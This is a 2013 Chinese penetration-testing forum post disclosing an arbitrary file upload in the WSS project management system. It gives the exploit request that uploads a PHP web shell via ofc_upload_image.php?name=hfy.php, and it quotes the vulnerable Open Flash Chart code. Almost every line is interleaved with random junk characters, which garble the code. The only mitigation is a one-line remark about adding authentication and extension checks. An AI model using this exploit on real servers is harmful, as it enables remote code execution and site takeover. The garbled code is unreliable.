中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]

作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存
, w* M' k/ t/ n# [6 X8 B 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
5 ?+ A0 R! m1 U" |) o; S- w( V$ W# o4 Z0 @
利用:
2 v' M1 ]( |* c! e# y# l/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
( ~7 K  O5 f, h7 y" C  d9 M& d: l, F
Post任意数据
! ^. I* f/ X* _. t& T& y+ `保存位置http://localhost/chart/tmp-upload-images/hfy.php' l. p- f' E( m2 Q5 ^0 x
[attach]201[/attach]* x5 |2 H7 F5 B( p! G1 v9 }
[attach]202[/attach]4 \( C4 \4 W5 ]
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~4 @3 m2 E' N) d$ ^
. ?5 \0 r% `, `3 _% V8 S
<?php
8 k6 a4 o( x, e: z# i1 \7 N' X9 f$ j! J& _; O. q
//8 y. N) i3 w3 q  h9 t
// In Open Flash Chart -> save_image debug mode, you! r& G4 i5 c# i2 T: V4 g
// will see the 'echo' text in a new window.6 Q4 X- M- a! E+ T1 X  l) U2 z% m: Z
//
$ I2 T7 K2 n: L" S& x
5 D3 G6 }% {# a$ G2 h0 A% Q! I# B  F/*) `( K3 C8 h! ]- s  P
$ N. _! @8 L# p
print_r( $_GET );
/ q) j: W3 \$ f( ~$ H7 ~print_r( $_POST );
7 E+ ?$ n* d: Eprint_r( $_FILES );8 E/ K; d4 p) L$ [

7 P: Z2 [7 {: N' xprint_r( $GLOBALS );0 y3 w8 j: K5 E+ \+ q
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
1 V( i) G3 p, r7 i
9 u+ i  J; l# m5 W+ w*/0 @0 f, i8 F$ z' k. v( S; T- g
// default path for the image to be stored //' `. U: W5 b: N' b* T& [% ]
$default_path = '../tmp-upload-images/';
5 A. T5 u5 {8 `# L- Q9 A
2 e# l# F1 }$ ?0 f& dif (!file_exists($default_path)) mkdir($default_path, 0777, true);
1 s$ N4 M6 O; x9 W! G% G
8 o3 i; ^4 B' x" i- V// full path to the saved image including filename //4 ^' J4 q( x, l4 h* y' k# S
$destination = $default_path . basename( $_GET[ 'name' ] ); - u: U/ H( a8 a; V6 A6 ?' i4 h
5 w7 B/ T# ~/ J% {* f9 r
echo 'Saving your image to: '. $destination;7 b( @4 \4 T7 L2 f' A
// print_r( $_POST );3 H& X  d  c5 p2 H5 A
// print_r( $_SERVER );9 `; o" @4 b4 k* L
// echo $HTTP_RAW_POST_DATA;
, a. B: @( ^3 m* Q
" y- W& [  ?7 W5 O/ c: t8 s- w) r) d. P//
' L! d5 _  x; s5 C- `// POST data is usually string data, but we are passing a RAW .png
4 L4 ^9 B; C5 H6 E/ z8 e6 W: N// so PHP is a bit confused and $_POST is empty. But it has saved8 C' r/ s! U( i; u
// the raw bits into $HTTP_RAW_POST_DATA
- V2 W8 _5 c' c4 E8 q+ E//6 u2 n" x* g( |' _+ ?$ t
; V3 ?5 q  k) W; ~9 T
$jfh = fopen($destination, 'w') or die("can't open file");) I' K+ I/ v% `7 n- W1 x$ B( Z8 w
fwrite($jfh, $HTTP_RAW_POST_DATA);3 b9 O: T, n6 B0 _
fclose($jfh);
8 a, U( z9 k0 W  P6 S7 d  [4 A( @! x8 y5 `& @
//
$ [4 H! u+ ~3 J0 [2 T! s  g// LOOK:
( Q3 K' s$ [' [; f# t//
6 U5 A, _4 l3 N" u- g% \( H" Oexit();
; Y( [+ J& A/ c  @4 |% i//# Y' ~8 @* A: d/ z# [; K& c3 T
// PHP5:
" h9 |! H7 L$ ?( s6 X//
- p+ U$ U) N' x( b; [# a  w+ k
; c: _; ]/ v3 n7 z& ^, y& q7 s8 j5 B; q) J1 Y$ l& C
// default path for the image to be stored //9 S( f, G3 S* x7 _
$default_path = 'tmp-upload-images/';4 P; [- A- m  x$ D0 d* L
0 y* f3 ?# q  j7 \7 B3 L
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
' ~* m" b  a  P( ]6 j, h. q
1 Z5 C! K" n0 r// full path to the saved image including filename //' F' P1 m+ w" H# I9 L5 G* ~
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); , m6 V4 ^7 h) x: c& m( |
" `- f/ {! o2 @
// move the image into the specified directory //, U' N* ]4 _! U! V( Z) l3 u% x4 O
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
: Y- e: R. k8 P) q( s- P( b    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";* c7 q! c9 \! Q. K
} else {3 R! j4 Z: K9 R
    echo "FILE UPLOAD FAILED";- m0 Z. u# e4 W8 m, b! B+ c
}
4 f3 c$ X1 B( j0 d' d. X
7 h% O0 L9 ?' P2 B  b
/ e' y- W* I4 @% v1 ^% t?>
: L0 [5 w4 u$ d6 H: k# i* k, @6 o0 A

7 P% `" k& j4 S; l7 _- s2 i0 V% K3 j4 m# x. |2 C2 d4 M) H9 v8 m
( E8 o" G* {( G& a% E# G* g
[attach]203[/attach]
/ F7 `+ [" ^/ h. B+ @
) G1 M$ q# ~+ c1 S! x% V* L2 b( k修复方案:
/ Q! b! O" S: e7 \  U0 r4 x这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
: W7 Y) V4 w; C9 q& z' H& F% u
, s& W/ G% l- z9 V0 J) N' w( V7 e8 t% }
6 [5 L0 ^- S0 a' m+ C) I2 u& {' N
+ G  U! s# Z3 M& K5 [





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2